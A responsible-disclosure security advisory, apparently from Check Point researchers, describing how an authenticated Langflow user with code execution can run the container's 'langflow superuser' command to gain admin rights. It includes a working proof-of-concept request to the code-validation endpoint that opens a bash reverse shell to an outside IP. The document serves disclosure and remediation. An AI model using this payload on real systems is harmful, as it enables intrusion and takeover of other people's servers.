This vulnerability was discovered by researchers at Check Point. We are sharing this report as part of a responsible disclosure process and are happy to assist in validation and remediation if needed.
A privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command langflow superuser to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account.
Langflow's Docker image includes a CLI binary at /app/.venv/bin/langflow that exposes sensitive commands, including:
langflow superuser
This command allows creation of a new superuser without checking whether one already exists.
When combined with code execution (e.g., via the authenticated /api/v1/validate/code endpoint), a low-privileged user can execute:
/app/.venv/bin/langflow superuser
inside the container, and elevate themselves to full superuser privileges.
This effectively bypasses frontend role enforcement and backend user integrity, leading to full compromise of the Langflow application.
<img width="1311" height="627" alt="image" src="https://github.com/user-attachments/assets/9b75bdc3-31ea-48c0-9e84-c2b168f404b3" />
Send an authenticated POST request:
{
"code": "def foo(p=__import__('os').system(\"bash -c 'bash -i >& /dev/tcp/192.168.1.22/4444 0>&1'\")):\n pass"
}
<img width="731" height="217" alt="image" src="https://github.com/user-attachments/assets/cb8497c6-0d61-414e-afe2-69bbbaf55cbc" />
<img width="1262" height="532" alt="image" src="https://github.com/user-attachments/assets/1f0a713d-3d61-4aa4-a25b-58f4b58c061b" />
langflow run
inside the container, which may lead to resource exhaustion (CPU, memory) and service degradation.{ "severity": "HIGH", "github_reviewed_at": "2025-08-25T16:21:04Z", "nvd_published_at": null, "cwe_ids": [ "CWE-269" ], "github_reviewed": true }